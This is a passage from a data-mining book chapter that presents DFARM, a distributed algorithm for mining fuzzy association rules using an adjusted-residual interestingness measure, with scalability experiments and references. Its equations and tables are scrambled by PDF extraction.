For example, given a linguistic variable Height and a linguistic term Tall, we have λTall(t) = μTall(t[Height]). If l (t ) = 1, t is completely characterized by ij the linguistic term lij. If lij (t ) = 0, t is undoubtedly not characterized by the linguistic term lij. If 0 < lij (t ) < 1, t is partially characterized by the linguistic term lij. In the case where t[Ai] is unknown, l (t ) = 0.5, which indicates that there is ij no information available concerning whether t is or is not characterized by the linguistic term lij. t can also be characterized by more than one linguistic term. Let ϕ be a subset of integers such that ϕ = {i1, …, ih}, where ϕ ⊆ {1, …, n} and |ϕ| = h ≥ 1. We also suppose that Aϕ is a subset of A such that Aϕ = {Ai | i ∈ ϕ}. Given any Aϕ, it is associated with a set of linguistic terms, T(L ϕ) = {lϕj | j = 1, …, sj = ∏ si }, where sϕ denotes i∈j the number of linguistic terms and lϕj is represented by a fuzzy set, Fϕj, such that Fj j = Fi1 j1 ∩ ... ∩ Fih jh , ik ∈ ϕ, j k ∈ sik . The degree to which t is characterized by the term lϕj, l j (t ), is given by l
j
(t ) = min(
Fi1 j1
(t[ Ai1 ]), ...,
Fih jh
(t[ Aih ])). (5)
For instance, given linguistic variables Height and Weight, and linguistic terms Tall and Heavy, we have λTall ∧ Heavy = min(μTall(t[Height]), μHeavy(t[Weight])). In fact, other t-norms (e.g., the multiplication operation) can also be used in the calculation of Equation 5. We use the minimum operation here because it is one of the most popular t-norms used in the literature (see, e.g., Mendel, 1995; Yen & Langari, 1999). Based on the linguistic variables and linguistic terms, we can use DFARM to discover fuzzy association rules that are represented in a manner that is more natural for human users to understand when compared to their crisp counterparts.
An Objective Interestingness Measure We define the fuzzy support of a linguistic term lϕk, which is represented by fsup(lϕk), as
fsup (l k ) =
∑
l
t∈D s
(t )
k
,
∑∑ t∈D j =1
l
j
(6)
(t )
where the nominator and the denominator are the cardinality of lϕk and that of all the linguistic terms defined in the same domain, respectively. Since ∑ fsup(l ) = 1 , fsup(lϕk) can be considered the probability that a tuple is characterized by linguistic term lϕk. In the rest of this chapter, the association between a linguistic term lϕk and another linguistic term lpq is expressed as lϕk → lpq, for example, Cheap ∧ Light → Best Seller, where Cheap, Light, and Best Seller are linguistic terms. We define the fuzzy support of the association lϕk → lpq, fsup(lϕk → lpq) as sj
k =1
fsup (l
k
jk
→ l pq ) =
∑ min( t∈D sp s
l
k
(t ),
∑∑∑ min(
l
t∈D j =1 u =1
j
l pq
(t ),
(t )) , l pu
(t ))
(7) where the nominator is the cardinality of Fϕk ∩ Fpq while the denominator is the cardinality of all the possible combinations of fuzzy sets defined in the same domain. Similarly, ∑∑ fsup(l → l ) = 1 , and hence fsup(lϕk → lpq) can be considered the probability that a tuple is characterized by both lϕk and lpq. Other t-norms, such as the multiplication operation, are also applicable to the calculation of the fuzzy support. We use the minimum operation in Equation 7 so as to be consistent with Equation 5. sj
sp
j =1 u =1
jj
pu
2433
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
We, in turn, define the fuzzy confidence of the association lϕk → lpq, fconf(lϕk → lpq), as
fconf (lj k → l pq ) =
fsup (lj k → l pq )
.
(8)
fsup (lj k )
Intuitively, fconf(lϕk → lpq) can be considered the probability that a tuple is characterized by lpq given that it is also characterized by lϕk. To decide whether the association lϕk → lpq is interesting, we determine whether the difference between fconf(lϕk → lpq) and fsup(lpq) is significant. The significance of the difference can be objectively evaluated using the adjusted residual (Haberman, 1973). It is defined in terms of the fuzzy support and the fuzzy confidence (Au & Chan, 2001, 2003; Chan & Au, 1997, 2001) that reflects the difference in the actual and the expected degree to which a tuple is characterized by different linguistic terms. The adjusted residual d(lϕk → lpq) is defined in Haberman (1973) as
d (l
k
→ l pq ) =
z (l
→ l pq )
k
(l
k
→ l pq )
,
(9)
where z(lϕk → lpq) is the standardized residual, which is defined as s
z (l k → l pq ) =
sp
fsup(l k → l pq ) × ∑∑∑ min( t∈D j =1 u =1
l
j
(t ),
l pu
(t )) − e(l k → l pq )
.
e(l k → l pq )
e(lϕk → lpq) is the expected degree to which a tuple is characterized by lϕk and lpq and is calculated by s
sp
t∈D j =1 u =1
l
j
(t ),
l pu
(t )),
(11) and γ(lϕk → lpq) is the maximum likelihood estimate of the variance of z(lϕk → lpq) and is given by
2434
k
→ l pq ) = (1 − fsup (l k ))(1 − fsup (l pq )).
(12)
The measure defined by Equation 9 can be used as an objective interestingness measure because it does not depend on any user’s subjective inputs. Since d(lϕk → lpq) is in an approximate standard normal distribution, if |d(lϕk → lpq)| > 1.96 (the 95th percentile of the standard normal distribution), we conclude that the difference between fconf(lϕk → lpq) and fsup(lpq) is significant at the 5% significance level. Specifically, if d(lϕk → lpq) > 1.96, the presence of lϕk implies the presence of lpq. In other words, whenever lϕk is found in a tuple, the probability that lpq is also found in the same tuple is expected to be significantly higher than when lϕk is not found. We say that the association lϕk → lpq is positive. On the other hand, if d(lϕk → lpq) < –1.96, the presence of lϕk implies the absence of lpq. In other words, whenever lϕk is found in a tuple, the probability that lpq is also found in the same tuple is expected to be significantly lower than when lϕk is not found. We say that the association lϕk → lpq is negative. It is important to note that d(lϕk → lpq) is defined in terms of the fuzzy support and the fuzzy confidence of the linguistic terms. They are, in turn, defined in terms of the probabilities of the corresponding fuzzy events. As a result, the conclusion that the adjusted residual is in an approximate standard normal distribution (Haberman, 1973) is still valid.
Formation of Fuzzy Association Rules
(10)
e(l k → l pq ) = fsup (l k ) × fsup (l pq ) × ∑∑∑ min(
(l
In the context of rule mining, the number of conditions in the antecedent of a rule is often referred to as its order (Smyth & Goodman, 1992; Wong & Wang, 1997). A first-order fuzzy association rule can be defined as a rule involving one linguistic term in its antecedent. A second-order fuzzy association rule can be defined as a rule involving two linguistic terms in its antecedent. A third-order
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
fuzzy association rule can be defined as a rule involving three linguistic terms in its antecedent, and so on for other higher orders. Given that lϕk → lpq is interesting, we can form the following fuzzy association rule:
l
k
→ l pq [ w(l
k
fconf (l
k
→ l pq )
.
(13)
fsup (l pq )
Based on mutual information, the weight of evidence is defined in Osteyee and Good (1974) as w(lj k → l pq ) = I (l pq : lj k ) − I (∪ (l pj : lj k ) = log j ≠q
,
where i1, …, ih ∈ ϕ.
DISTRIBUTED MINING OF FUZZY ASSOCIATION RULES
→ l pq )],
where w(lϕk → lpq) is the weight-of-evidence measure (Osteyee & Good, 1974), which is a confidence measure that represents the uncertainty associated with lϕk → lpq. This measure is defined as follows. Since the relationship between lϕk and lpq is interesting, there is some evidence for a tuple to be characterized by lpq given that it has lϕk. The weight of evidence is defined in terms of an information-theoretic measure known as mutual information (see, e.g., MacKay, 2003). The mutual information measures the change of uncertainty about the presence of lpq in a tuple given that it has lϕk. It is defined as
I (l pq : l k ) = log
Li1 = li1 j1 ∧ .. ∧ Lih = lih jh → L p = l pq [ w(lj k → l pq )]
fsup (lj k → l pq ) fsup (l pq ) fsup (∪ lj k → l pj ) fsup (∪ l pj ) j ≠q
.
j ≠q
(14) w(lϕk → lpq) can be interpreted intuitively as a measure of the difference in the gain in information when a tuple that is characterized by lϕk is also characterized by lpq as opposed to being characterized by other linguistic terms. Since lϕk is defined by a set of linguistic terms li1 j1 , ..., lih jh ∈ l , we have a high-order fuzzy association rule
In this section, we present DFARM, which is a distributed algorithm for discovering fuzzy association rules. It extends count distribution (Agrawal & Shafer, 1996) to (a) handle fuzzy data and (b) utilize the objective interestingness measure presented in the previous section to differentiate interesting and uninteresting associations. To handle the large combination of linguistic terms, it embraces a heuristic that the association l ′k → l pq, where ′ = 1 ∪ 2, is more likely to be interesting if both the associations l k → l pq 1 and l 2 k → l pq are interesting vs. the case where only one or neither of them is interesting. Using this heuristic, DFARM evaluates the interestingness of only the associations between different combinations of conditions in lower order association rules. The details of DFARM are given in the following. In a distributed system comprising m sites S1, …, Sm, the database relation D is horizontally partitioned over the m sites into D1, …, Dm. Let the number of tuples in database partition Dj be Nj, j = 1, …, m. The fuzzy support count of linguistic term lϕk, where ϕ ⊆ {1, …, n} and |ϕ| = h ≥ 1, in D is given by
count (l k ) = ∑ t∈D
l
k
(t ),
(15)
where l lj k (t ) is the degree to which t is characterized by lϕk, defined by Equation 4. Similarly, the fuzzy support count of lϕk in Dj is calculated by
count j (l k ) =
∑
t∈D j
l
k
(t ).
(16)
2435
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
It is obvious to note that
m
m
count (lj k ) = ∑ count j (lj k ) .
(17)
count (lj k → l pq ) = ∑ count j (lj k → l pq ) . (20) j =1
j =1
We refer to count(lϕk) as the global fuzzy support count of lϕk, and countj(lϕk) as the local fuzzy support count of lϕk at site Sj. Let us consider an hth-order association, lϕk → lpq. The fuzzy support count of lϕk → lpq in D is given by count (l
k
→ l pq ) = ∑ min( t∈D
l
(t ), k
l pq
(t )), (18)
We refer to count(lϕk → lpq) as the global fuzzy support count of lϕk → lpq, and countj(lϕk → lpq) as the local fuzzy support count of lϕk → lpq at site Sj. The fuzzy support of the linguistic term lϕk and that of the association lϕk → lpq in terms of fuzzy support counts are given by
fsup (lj k ) =
count (lj k )
∑ count (l j =1
whereas the fuzzy support count of lϕk → lpq in Dj is calculated by count j (l
k
→ l pq ) =
∑ min(
t∈D j
l
k
(t ),
Again, it is obvious to note that
l pq
(t )). (19)
(21)
sj
jj
)
and
fsup (lj k → l pq ) =
count (lj k → l pq ) sj
su
∑∑ count (l j =1 u =1
jj
Figure 1. The DFARM algorithm /* Rh consists of hth-order rules */ if (h = 1) then { forall (lik, lpq ∈ l, i ≠ p) { scan Dj to find countj(lik), countj(lpq), and countj(lik → lpq); } exchange countj(lik), countj(lpq), and countj(lik → lpq) with all the other sites to calculate count(lik), count(lpq), and count(lik → lpq); R1 = {lik → lpq [w(lik → lpq)] | i ≠ p and d(lik → lpq) > 1.96}; } else { C = {each linguistic term in the antecedent of r | r ∈ Rh – 1} forall (lϕk comprising h linguistic terms in C) { forall (lpq, q = 1, …, sp) { scan Dj to find countj(lϕk), countj(lpq), and countj(lϕk → lpq); } } exchange countj(lϕk), countj(lpq), and countj(lϕk → lpq) with all the other sites to calculate count(lϕk), count(lpq), and count(lϕk → lpq); Rh = {lϕk → lpq [w(lϕk → lpq)] | d(lϕk → lpq) > 1.96}; }
2436
→ l pq )
, (22)
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
respectively. Based on Equations 21 and 22, we can calculate d(lϕk → lpq), defined by Equation 9, to determine whether the association lϕk → lpq is or is not interesting. To mine fuzzy association rules, each site in the distributed system runs DFARM. Each site scans its database partition in each pass. At the hth iteration, each site Sj generates the candidate hth-order rules from the (h – 1)th-order rules. Site Sj then scans its database partition Dj to obtain the local fuzzy support counts of all the candidate hth-order rules. After that, site Sj exchanges the local fuzzy support counts with all the other sites to find the global fuzzy support counts. Subsequently, each site Sj evaluates the interestingness of the candidate hth-order rules to obtain the interesting ones (i.e., the hth-order rules). Site Sj then generates the candidate (h + 1)th-order rules from the hth-order rules and this process repeats. The algorithm terminates when neither an hth-order rule nor a candidate (h + 1)th-order rule is found. Figure 1 shows this algorithm. Since each site in the distributed system exchanges its local fuzzy counts with all the other sites to calculate the global fuzzy counts, the (h – 1)th-order rules and hence the candidate hth-order rules, which are generated from the (h – 1)th-order rules, found at different sites are identical for all h. After the termination of DFARM, each site therefore discovers an identical set of fuzzy association rules. As an example, given a database comprising three attributes, Age, Marital Status, and Wage, let dom(Age) be represented by linguistic terms, Young, Middle Aged, and Old; dom(Marital Status) be represented by Unmarried and Married; and dom(Wage) be represented by Low and High. If DFARM finds first-order rules Young → Low, High → Middle Aged, and Married → High are interesting, it obtains R1 = {Young → Low, High → Middle Aged, Married → High} and C = {Young, High, Married}. It then computes the adjusted residuals of the candidate second-order rules (i.e., Young ∧ High → Unmarried, Young ∧
High → Married, Young ∧ Married → Low, Young ∧ Married → High, High ∧ Married → Young, High ∧ Married → Middle Aged, and High ∧ Married → Old) to determine whether they are interesting. It continues to find the candidate higher order rules and calculates their interestingness until neither an interesting rule nor a candidate rule is found.
EXPERIMENTAL RESULTS To evaluate the effectiveness of the proposed interestingness measure, as given by Equation 9, we applied it to two synthetic data sets. Furthermore, we implemented DFARM in a distributed system using PVM (Geist et al., 1994). To perform our experiments, we used a 100 Mb LAN (local area network) to connect 10 Sun Ultra 5 workstations, each of which has 64 MB of main memory running Solaris 2.5.1. Each workstation has a local drive and its database partition was loaded on its local drive before each experiment started. We used a popular benchmark data set to evaluate the computation performance of DFARM.
An Evaluation of Effectiveness In this subsection, we used two synthetic data sets to evaluate the effectiveness of the proposed interestingness measure. One of the data sets is composed of only uniform random data, whereas the other is generated in a way that inherent relationships are present in the data.
Testing with Uniform Random Data In our first experiment, we used a set of uniform random data to evaluate the ability of the proposed interestingness measure to handle noises when the data contain no organization or structure. The data set consists of 2,000 pairs of values generated randomly and independently for two attributes, X and Y, in the range between 0 and 10. Since the data
2437
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
Equation 23
Equation 24
if x ≤ 1.97 ⎧1 ⎪ μVery Small ( x) = ⎨(2.01 − x) 0.04 if 1.97 < x ≤ 2.01 ⎪0 otherwise ⎩ ⎧( x − 1.97) 0.04 if 1.97 < x ≤ 2.01 ⎪1 if 2.01 < x ≤ 3.99 ⎪ μ Small ( x) = ⎨ − (4.02 x ) 0.03 if 3.99 < x ≤ 4.02 ⎪ ⎪⎩0 otherwise ⎧( x − 3.99) 0.03 if 3.99 < x ≤ 4.02 ⎪1 if 4.02 < x ≤ 5.99 ⎪ μ Medium ( x) = ⎨ ⎪(6.01 − x) 0.02 if 5.99 < x ≤ 6.01 ⎪⎩0 otherwise ⎧( x − 5.99) 0.02 if 5.99 < x ≤ 6.01 ⎪1 if 6.01 < x ≤ 8.00 ⎪ μ Large ( x) = ⎨ ⎪(8.01 − x) 0.01 if 8.00 < x ≤ 8.01 ⎪⎩0 otherwise ⎧( x − 8.00) 0.01 if 8.00 < x ≤ 8.01 ⎪ μVery Large ( x) = ⎨1 if x > 8.01 ⎪0 otherwise ⎩
if y ≤ 4.99 ⎧1 ⎪ μ Small ( y ) = ⎨(5.02 − y ) 0.03 if 4.99 < y ≤ 5.02 ⎪0 otherwise ⎩ ⎧( y − 4.99) 0.03 if 4.99 < y ≤ 5.02 ⎪ if y > 5.02 μ Large ( y ) = ⎨1 ⎪0 otherwise ⎩
are generated randomly, no interesting associations ought to be discovered. Figure 2 shows the data. From the data set, we employed the fuzzy partitioning approach proposed in Au et al. (2006) to generate five and two fuzzy sets for X and Y, respectively. The membership functions of the fuzzy sets representing the domain of X are the following (see Equation 23).
Figure 2. Uniform random data 10
8
6
4
2
0 0
2438
2
4
6
8
10
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
Table 1. The interestingness of associations Association X = Very Small → Y = Small X = Small → Y = Small X = Medium → Y = Small X = Large → Y = Small X = Very Large → Y = Small X = Very Small → Y = Large X = Small → Y = Large X = Medium → Y = Large X = Large → Y = Large X = Very Large → Y = Large
The membership functions of the fuzzy sets representing the domain of Y are the following (see Equation 24). The interestingness of the associations in the data is given in Table 1. Since the absolute values
of the adjusted residuals of all the associations are less than 1.96 (the 95th percentile of the standard normal distribution), we conclude that all of them are uninteresting at the 5% significance level. It illustrates the ability of our interestingness measure to reject random noises present in the data.
Figure 3. The second data set
Y=T
Z=F Z=T
Y=F
X=F
X=T
2439
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
Nevertheless, if the minimum support is set to 10% and the minimum confidence is set to 50%, association rule mining algorithms based on the support-confidence framework will find 4 of the 10 associations interesting. When compared to the use of support and confidence measures that may accidentally mistake random patterns as interesting, the proposed measure is more effective.
Testing with Inherent Relationships Embedded in the Data In our second experiment, we tested the proposed measure for effectiveness when it is used to discover high-order associations. In this data set, each tuple is characterized by three attributes, namely, X, Y, and Z. Each of them can take on two values: T and F. The data set contains 1,024 tuples and we generated the data according to the following relationships. X=F∧Y=F→Z=F X=F∧Y=T→Z=T X=T∧Y=F→Z=T X=T∧Y=T→Z=F
256 tuples (i.e., 25% of all tuples) from F to T and vice versa. Figure 3 shows the data. The association rules discovered based on the proposed interestingness measure together with their supports and confidences are given in Table 2. As shown in Table 2, our interestingness measure is able to discover the association rules that reflect exactly the inherent relationships embedded in the data. However, if the minimum support is set to 20% and the minimum confidence is set to 25%, as used in Srikant and Agrawal (1996), association rule mining algorithms adopting the support-confidence framework cannot find any of these associations. It demonstrates a weakness with the utilization of user-supplied thresholds. If a threshold is set too high, a user may miss some useful rules (e.g., the test with the data set presented in this subsection); if it is set too low, the user may be overwhelmed by many irrelevant ones (e.g., the test with the data set discussed in the last subsection).
An Evaluation of Scalability
To further examine the performance of our interestingness measure in the presence of uncertainty, 25% of random noises were added to the data set by randomly changing the value of Z in
The databases used in our experiments on scalability are synthetic data generated using the tool provided by IBM (IBM Quest Data Mining Project, 1996). Each tuple in the databases is characterized by nine attributes. Of the nine attributes, three are discrete and six are continuous.
Table 2. The association rules discovered in the second data set Association Rule X=F∧Y=F→Z=F X=F∧Y=F→Z=T X=F∧Y=T→Z=F X=F∧Y=T→Z=T X=T∧Y=F→Z=F X=T∧Y=F→Z=T X=T∧Y=T→Z=F X=T∧Y=T→Z=T
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
In order to evaluate the performance of DFARM, we also implemented count distribution in our test bed using PVM. We chose to implement count distribution because the experimental results presented in Agrawal and Shafer (1996) show that the performance of count distribution is superior to data distribution and candidate distribution. For each database, we discretized the domains of continuous attributes into several intervals, and mapped the
values of discrete attributes and the intervals of discretized continuous attributes into integers. We then applied count distribution to the transformed data. Since count distribution finds frequent item sets based on the support constraint, we applied it to the databases using various minimum supports so as to evaluate how its performance is affected by the setting of minimum support.
Figure 4. The size-up performance
Execution Time (sec.)
7000
DFA RM
6000
CD ( 2 % )
5000
CD ( 1 % )
CD ( 1 .5 % ) CD ( 0 .7 5% )
4000 3000 2000 1000 0 0
2
4
6
8
10
12
14
No. of Tuples (in m illions )
(a) Ex ecution tim e 12
DFA RM CD ( 2 % )
10
CD ( 1 .5 % ) CD ( 1 % )
Size-Up
8
CD ( 0 .7 5% )
6 4 2 0 0
2
4
6
8
10
12
14
No. of Tuples (in m illions )
(b) S ize-up
2441
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
Size-Up In our first experiment, we fixed the number of sites in the distributed system to 10. To evaluate the performance of DFARM and count distribution with respect to different database sizes, we increased the number of tuples from 1 million to 10 million in our experiment. Figure 4 shows the performance of DFARM and count distribution as the database size increases. In addition to the
absolute execution times, we plot the size-up, which is the execution time normalized with respect to the execution time for 1 million tuples in Figure 4 (CD (x%) denotes running count distribution with minimum support x%). As shown in Figure 4, DFARM scales almost linearly in this experiment. When the database size increases, more and more I/O (input/output) and CPU (central processing unit) processing are required to (a) scan the database to obtain the fuzzy local counts and (b) compute the interestingness
Figure 5. The speedup performance 14000
DFA RM CD ( 2 % )
12000
CD ( 1 .5 % ) CD ( 1 % )
Execution Time (sec.)
10000
CD ( 0 .7 5 % )
8000 6000 4000 2000 0 0
2
4
6
8
10
12
14
N o. of S ites
(a) Ex ecution tim e 12
DFA RM CD ( 2% )
10
CD ( 1.5% ) CD ( 1% )
Speedup
8
CD ( 0.75 % )
6 4 2 0 0
2
4
6
8 N o. of S ites
(b) S peedup
2442
10
12
14
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
measure for identifying interesting associations. The amount of execution time spent in communication is more or less the same regardless of the database size because the number of associations is independent of the database size and only its fuzzy local counts are exchanged between different sites in the distributed system. This characteristic of the algorithm results in the reduction of the percentage of the overall execution time spent in communication. Since the I/O and CPU processing in DFARM scales linearly with the database size, they show almost linear performance. This experiment also shows that the performance of DFARM is superior to count distribution with respect to different database sizes. Specifically, DFARM is 2.8 times faster than count distribution with minimum support 2%, and 7.6 times faster than count distribution with minimum support 0.75%.
Speedup In our second experiment, we fixed the database size to 2 million tuples. To evaluate the performance of DFARM and count distribution with respect to different numbers of sites in the distributed system, we increased the number of sites from 1 to 10 in our experiment. Figure 5 shows their performance as the number of sites increases. In addition to the absolute execution times, we plot the speedup, which is the execution time normalized with respect to the execution time for a single site, in Figure 5. As shown in Figure 5, DFARM exhibits very good speedup performance in this experiment. In particular, when there are m sites in the distributed system, it shortens the execution time to about 1/m of the execution time for a single site. Nonetheless, given the same amount of data, the speedup performance deteriorates as the number of sites in the distributed system increases. It is because the communication time becomes a significant portion of the overall execution time in comparison to
the relatively small processing time for the small amount of data to process at each site. This experiment also shows that DFARM outperforms count distribution with respect to different numbers of sites in the distributed system. Specifically, when there are two sites in the distributed system, DFARM is 2.7 times faster than count distribution with minimum support 2%, and 7.4 times faster than count distribution with minimum support 0.75%; when there are 10 sites in the distributed system, DFARM is 3 times faster than count distribution with minimum support 2%, and 8.3 times faster than count distribution with minimum support 0.75%.
Scale-Up In this experiment, we fixed the size of the database partition at a site to 1 million tuples. We increased the number of sites in the distributed system from 1 to 10. Figure 6 shows the performance of DFARM as the number of sites increases. In addition to the absolute execution time, we plot the scale-up, which is the execution time normalized with respect to the execution time for a single site, in Figure 6. As shown in Figure 6, DFARM has very good scale-up performance. Since the number of associations it finds does not change when the database size increases, the I/O and CPU processing at each site remains constant. The execution time increases slightly as the database size and the number of sites increase. The small increment in execution time is due to the increase in the communication overhead when there are more and more sites in the distributed system. This experiment also shows that DFARM can better handle larger databases when more processors are available when compared to count distribution. DFARM is 2.7 times faster than count distribution with minimum support 2%, and 7.4 times faster than count distribution with minimum support 0.75%.
2443
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
Figure 6. The scale-up performance
Execution Time (sec.)
7000
DFA RM
6000
CD (2 % )
5000
CD (1 % )
CD (1 .5 % ) CD (0 .7 5% )
4000 3000 2000 1000 0 0
2
4
6
8
10
12
14
No. of S ites
(a) Ex ecution tim e 2
DFA RM
Scale-Up
1.8
CD ( 2% )
1.6
CD ( 1.5% )
1.4
CD ( 1% )
1.2
CD ( 0.75 % )
1 0.8 0.6 0.4 0.2 0 0
2
4
6
8
10
12
14
N o. of S ites
(b) S cale-up
CONCLUSION In this chapter, we introduce a new distributed algorithm, called DFARM, for mining fuzzy association rules from very large databases. DFARM employs an objective interestingness measure to discriminate interesting and uninteresting associations. It is shown to be very effective in identifying
2444
interesting associations in noisy data. It also has the advantage in that it does not require users to specify any thresholds, which can probably be found by trials and errors only. In addition to the ability to discover interesting associations in databases, DFARM exploits the high scalability of distributed systems to better handle very large databases. We implemented DFARM
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
in a distributed system using PVM. We applied it to several databases to evaluate its effectiveness and scalability performance. The results of our experiments on scalability demonstrate that DFARM has very good size-up, speedup, and scale-up performance.
REFERENCES Agrawal, R., Imielinski, T., & Swami, A. (1993). Mining association rules between sets of items in large databases. In Proceedings of the ACM SIGMOD International Conference on Management of Data (pp. 207-216). Agrawal, R., & Shafer, J. C. (1996). Parallel mining of association rules. IEEE Transactions on Knowledge and Data Engineering, 8(6), 962-969. Agrawal, R., & Srikant, R. (1994). Fast algorithms for mining association rules. In Proceedings of the 20th International Conference on Very Large Data Bases (pp. 487-499). Au, W.-H., & Chan, K. C. C. (2001). Classification with degree of membership: A fuzzy approach. In Proceedings of the First IEEE International Conference on Data Mining (pp. 35-42). Au, W.-H., & Chan, K. C. C. (2003). Mining fuzzy association rules in a bank-account database. IEEE Transactions on Fuzzy Systems, 11(2), 238-248. Au, W.-H., Chan, K. C. C., & Wong, A. K. C. (2006). A fuzzy approach to partitioning continuous attributes for classification. IEEE Transactions on Knowledge and Data Engineering, 18(5), 715-719. Carrasco, R. A., Vila, M. A., Galindo, J., & Cubero, J. C. (2000). FSQL: A tool for obtaining fuzzy dependencies. In Proceedings of the Eighth International Conference on Information Processing and Management of Uncertainty in Knowledge-Based Systems (pp. 1916-1919).
Chan, K. C. C., & Au, W.-H. (1997). Mining fuzzy association rules. In Proceedings of the Sixth International Conference on Information and Knowledge Management (pp. 209-215). Chan, K. C. C., & Au, W.-H. (2001). Mining fuzzy association rules in a database containing relational and transactional data. In A. Kandel, M. Last, & H. Bunke (Eds.), Data mining and computational intelligence (pp. 95-114). New York: Physica-Verlag. Delgado, M., Marín, N., Sánchez, D., & Vila, M.A. (2003). Fuzzy association rules: General model and applications. IEEE Transactions on Fuzzy Systems, 11(2), 214-225. Geist, A., Beguelin, A., Dongarra, J., Jiang, W., Manchek, R., & Sunderam, V. (1994). PVM: Parallel virtual machine. A user’s guide and tutorial for networked parallel computing. Cambridge, MA: MIT Press. Haberman, S. J. (1973). The analysis of residuals in cross-classified tables. Biometrics, 29(1), 205-220. Han, E.-H., Karypis, G., & Kumar, V. (1997). Scalable parallel data mining for association rules. In Proceedings of the ACM SIGMOD International Conference on Management of Data (pp. 277288). Han, J., & Kamber, M. (2001). Data mining: Concepts and techniques. San Francisco: Morgan Kaufmann. Han, J., Pei, J., & Yin, Y. (2000). Mining frequent patterns without candidate generation. In Proceedings of the ACM SIGMOD International Conference on Management of Data (pp. 1-12). Hand, D., Mannila, H., & Smyth, P. (2001). Principles of data mining. Cambridge, MA: The MIT Press. Hirota, K., & Pedrycz, W. (1999). Fuzzy computing for data mining. Proceedings of the IEEE, 87(9), 1575-1600.
2445
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
Hong, T. P., Kuo, C. S., & Chi, S. C. (1999). Mining association rules from quantitative data. Intelligent Data Analysis, 3(5), 363-376. IBM Quest Data Mining Project. (1996). Quest synthetic data generation code. Retrieved October 12, 2001, from http://www.almaden.ibm.com/cs/ quest/syndata.html Kuok, C.-M., Fu, A., & Wong, M. H. (1998). Mining fuzzy association rules in databases. SIGMOD Record, 27(1), 41-46. Liu, B., Hsu, W., & Ma, Y. (1998). Integrating classification and association rule mining. In Proceedings of the Fourth International Conference on Knowledge Discovery and Data Mining (pp. 80-86). MacKay, D. J. C. (2003). Information theory, inference, and learning algorithms. Cambridge, United Kingdom: Cambridge University Press. Maimon, O., Kandel, A., & Last, M. (1999). Information-theoretic fuzzy approach to knowledge discovery in databases. In R. Roy, T. Furuhashi, & P. K. Chawdhry (Eds.), Advances in soft computing: Engineering design and manufacturing (pp. 315-326). London: Springer-Verlag. Mannila, H., Toivonen, H., & Verkamo, A. I. (1994). Efficient algorithms for discovering association rules. In Proceedings of the AAAI Workshop on Knowledge Discovery in Databases (pp. 181192). Mendel, J. M. (1995). Fuzzy logic systems for engineering: A tutorial. Proceedings of the IEEE, 83(3), 345-377. Osteyee, D. B., & Good, I. J. (1974). Information, weight of evidence, the singularity between probability measures and signal detection. Berlin, Germany: Springer-Verlag. Park, J. S., Chen, M.-S., & Yu, P. S. (1995a). An efficient hash-based algorithm for mining association rules. In Proceedings of the ACM SIGMOD
2446
International Conference on Management of Data (pp. 175-186). Park, J. S., Chen, M.-S., & Yu, P. S. (1995b). Efficient parallel data mining for association rules. In Proceedings of the Fourth International Conference on Information and Knowledge Management (pp. 31-36). Savasere, A., Omiecinski, E., & Navathe, S. (1995). An efficient algorithm for mining association rules in large databases. In Proceedings of the 21st International Conference on Very Large Data Bases (pp. 432-444). Shintani, T., & Kitsuregawa, M. (1996). Hash based parallel algorithms for mining association rules. In Proceedings of the Fourth International Conference on Parallel and Distributed Information Systems (pp. 19-30). Smyth, P., & Goodman, R. M. (1992). An information theoretic approach to rule induction from databases. IEEE Transactions on Knowledge and Data Engineering, 4(4), 301-316. Srikant, R., & Agrawal, R. (1996). Mining quantitative association rules in large relational tables. In Proceedings of the ACM SIGMOD International Conference on Management of Data (pp. 1-12). Wong, A. K. C., & Wang, Y. (1997). High-order pattern discovery from discrete-valued data. IEEE Transactions on Knowledge and Data Engineering, 9(6), 877-893. Yager, R. R. (1991). On linguistic summaries of data. In G. Piatetsky-Shapiro & W. J. Frawley (Eds.), Knowledge discovery in databases (pp. 347-363). Menlo Park, CA: AAAI/MIT Press. Yen, J., & Langari, R. (1999). Fuzzy logic: Intelligence, control, and information. Upper Saddle River, NJ: Prentice-Hall. Zhang, W. (1999). Mining fuzzy quantitative association rules. In Proceedings of the 11th IEEE
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
International Conference on Tools with Artificial Intelligence (pp. 99-102).
KEY TERMS Adjusted Residual: It is a statistic defined as a function of the difference in the actual and the expected number of tuples characterized by different linguistic variables (attributes) and linguistic terms (attribute values). It can be used as an interestingness measure. Associative Classification: It is a classification method based on association rules. An association rule with the class label as its consequent provides a clue that a tuple satisfying its antecedent belongs to a specific class. It can therefore be used as the basis of classification. Fuzzy Association Rule: A fuzzy association rule involves linguistic terms (fuzzy sets) in its antecedent and/or consequent. Fuzzy Partitioning: It is a methodology for generating fuzzy sets to represent the underly-
ing data. Fuzzy partitioning techniques can be classified into three categories: grid partitioning, tree partitioning, and scatter partitioning. Of the different fuzzy partitioning methods, grid partitioning is the most commonly used in practice, particularly in system control applications. Grid partitioning forms a partition by dividing the input space into several fuzzy slices, each of which is specified by a membership function for each feature dimension. Interestingness Measure: An interestingness measure represents how interesting an association is. The support is an example of interestingness measures. Negative Association Rule: A negative association rule’s antecedent and consequent show a negative association. If its antecedent is satisfied, it is unlikely that its consequent will be satisfied. Positive Association Rule: A positive association rule’s antecedent and consequent show a positive association. If its antecedent is satisfied, it is likely that its consequent will be satisfied.
This work was previously published in the Handbook of Research on Fuzzy Information Processing in Databases, edited by J. Galindo, pp. 685-705, copyright 2008 by Information Science Reference (an imprint of IGI Global).
2447
2448
Chapter 8.5
Looking for Information in Fuzzy Relational Databases Accessible Via Web Carmen Martínez-Cruz University of Jaén, Spain Ignacio José Blanco University of Granada, Spain M. Amparo Vila University of Granada, Spain
